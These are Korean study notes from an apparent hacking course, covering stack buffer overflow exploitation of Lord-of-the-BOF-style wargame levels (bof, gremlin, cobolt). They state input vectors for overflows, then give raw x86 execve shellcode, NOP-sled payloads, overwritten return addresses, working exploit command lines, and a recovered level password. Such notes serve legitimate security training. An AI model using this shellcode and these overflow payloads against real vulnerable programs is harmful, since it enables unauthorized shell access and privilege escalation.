<system 2개월차>

	- 풀이를 위한 필수 내용 수업.
	- 한 문제당 풀이시간 1시간.
	- 이후에는 풀이.

</system 2개월차>

<BOF>

	1. 프로그램 매개변수를 통해서
	2. 표준 입력을 통해서
	3. 네트워크 입력을 통해서(리모트 BOF)

</BOF>

<표준 입력을 통해서>

	shell의 파이프라인을 이용해서.
	다만 gdb에서는 불가능함.
	애초에 gdb에서는 shell명령을 실행하는 것이 불가능하다.

	(<shell code>; cat)| <executable>로 실행 하면 됨.

	<그냥 코드>| <executable>

</표준 입력을 통해서>


0xbffffab8 - ebp
0xbffffa64 - esp

\x31\xc0\x50\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80 길이 40

printf $(printf "\x31\xc0\x50\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80"; for x in `seq 1 64`; do printf "\x90"; done; printf "\x64\xfa\xff\xbf")| ./bof

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80 길이 35

("printf $(printf "\x31\xc0\x50\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80"; for x in `seq 1 69`; do printf "\x90"; done; printf "\x64\xfa\xff\xbf")"; cat)| ./bof

0xbffffa88 - esp
0xbffffb88 - ebp

0xbffffb58 - ebp
0xbffffa58 - esp

\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80

./gremlin $(printf "\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")$(for x in `seq 1 220`; do printf "\x90"; done)$(printf "\x58\xfa\xff\xbf")

gremlin: hello bof world

./cobolt $(for x in `seq 1 20`; do printf "\x90"; done; printf "\xbc\xfa\xff\xbf"; printf "\x31\xc0\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x31\xc0\x50\x8d\x44\x24\x04\x50\x31\xc0\xb0\x0b\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\xcd\x80")

0xbffffaa8 - esp
0xbffffab8 - ebp